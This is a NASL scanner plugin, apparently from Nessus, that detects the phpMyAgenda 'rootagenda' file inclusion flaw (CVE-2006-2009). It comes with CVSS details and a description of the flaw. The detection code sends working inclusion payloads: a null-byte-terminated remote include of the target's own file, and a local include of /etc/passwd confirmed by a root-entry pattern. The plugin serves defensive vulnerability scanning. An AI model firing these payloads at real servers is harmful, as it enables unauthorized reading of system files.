
phpMyAgenda rootagenda Parameter File Include Vulnerability

2006-05-03 00:00:00
This script is Copyright (C) 2006-2022 Ferdy Riphagen

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

EPSS

0.194

Percentile

96.4%

phpMyAgenda is installed on the remote system. It’s an open source event management system written in PHP.

The application does not sanitize the ‘rootagenda’ parameter in some of its files. This may allow an attacker to include arbitrary files, possibly taken from third-party systems, and parse them with privileges of the account under which the web server operates.

Successful exploitation of this issue requires that PHP’s ‘register_globals’ setting be enabled.

#%NASL_MIN_LEVEL 70300
#
# Script Written By Ferdy Riphagen 
# <f[dot]riphagen[at]nsec[dot]nl>
#
# Script distributed under the GNU GPLv2 License.
#
# Original advisory / discovered by : 
# https://www.securityfocus.com/archive/1/431862/30/0/threaded
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  # Plugin registration: this branch runs only when the scanner loads the
  # script in description mode, so none of the detection logic below is
  # executed here.
  script_id(21305);
  script_version("1.18");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  # Public identifiers of the tracked issue.
  script_cve_id("CVE-2006-2009");
  script_bugtraq_id(17670);

  script_name(english:"phpMyAgenda rootagenda Parameter File Include Vulnerability");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is prone to
remote and local file inclusion attacks.");
  script_set_attribute(attribute:"description", value:
"phpMyAgenda is installed on the remote system.  It's an open source
event management system written in PHP. 

The application does not sanitize the 'rootagenda' parameter in some
of its files.  This may allow an attacker to include arbitrary files,
possibly taken from third-party systems, and parse them with
privileges of the account under which the web server operates. 

Successful exploitation of this issue requires that PHP's
'register_globals' setting be enabled.");
  script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/431862/30/0/threaded");
  # The advertised fix is a configuration change, not a vendor patch.
  script_set_attribute(attribute:"solution", value:
"Disable PHP's 'register_globals' setting.");
  # CVSSv2 base vector (network, low complexity, no auth, partial C/I/A)
  # and temporal vector (E:U/RL:OF/RC:C).
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"vuln_publication_date", value:"2006/04/24");
  script_set_attribute(attribute:"plugin_publication_date", value:"2006/05/03");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:phpmyagenda:phpmyagenda");
  # Extra install directories are only probed when thorough tests are on
  # (see the 'thorough_tests' check in the detection code).
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  # ACT_ATTACK: the check sends crafted requests to the target, so it is
  # scheduled with the attack-phase plugins rather than the passive ones.
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2006-2022 Ferdy Riphagen");

  # Run after HTTP service discovery; skip hosts where PHP was not found
  # or where CGI scanning has been disabled in the scan settings.
  script_dependencies("http_version.nasl");
  script_require_keys("www/PHP");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("misc_func.inc");

port = get_http_port(default:80, embedded:TRUE);
# Embedded web servers and hosts that cannot run PHP are out of scope.
if (get_kb_item("Services/www/"+port+"/embedded")) exit(0);
if (!can_host_php(port:port)) exit(0);

# Candidate install directories: the two well-known names are added only
# when thorough tests are enabled; otherwise only the generic CGI dirs
# are probed.
if (thorough_tests)
  dirs = list_uniq(make_list("/phpmyagenda", "/agenda", cgi_dirs()));
else
  dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  # Fingerprint: agenda.php3 of a phpMyAgenda install emits a link whose
  # query string starts with 'modeagenda=calendar'. Anything else is not
  # the application and the directory is skipped.
  fp_req = http_get(item:string(dir, "/agenda.php3"), port:port);
  fp_res = http_keepalive_send_recv(data:fp_req, bodyonly:TRUE, port:port);
  if (!egrep(pattern:"<a href=[^?]+\?modeagenda=calendar", string:fp_res)) continue;

  # First probe: ask infoevent.php3 to include the application's own
  # bugreport.txt fetched back from the target host itself (no
  # third-party host is involved). The trailing %00 is sent as in the
  # original probe string.
  remote_file = string("http://", get_host_name(), dir, "/bugreport.txt");
  rfi_req = http_get(item:string(dir, "/infoevent.php3?rootagenda=", remote_file, "%00"), port:port);
  rfi_res = http_keepalive_send_recv(data:rfi_req, bodyonly:TRUE, port:port);
  # A missing response is treated as the server having gone away.
  if (rfi_res == NULL) exit(0);

  if ("Bug report for phpMyAgenda" >< rfi_res)
  {
    security_hole(port);
    exit(0);
  }

  # Second probe, for hosts where remote URLs cannot be opened (for
  # example 'allow_url_fopen' set to Off): include a local file whose
  # content is recognisable.
  local_file = "/etc/passwd";
  lfi_req = http_get(item:string(dir, "/infoevent.php3?rootagenda=", local_file, "%00"), port:port);
  lfi_res = http_keepalive_send_recv(data:lfi_req, bodyonly:TRUE, port:port);
  if (lfi_res == NULL) exit(0);

  # A passwd-style root entry in the body means the file was included,
  # which in turn implies 'register_globals' is enabled on the host.
  if (egrep(pattern:"root:.*:0:[01]:.*:", string:lfi_res))
  {
    security_hole(port);
    exit(0);
  }
}
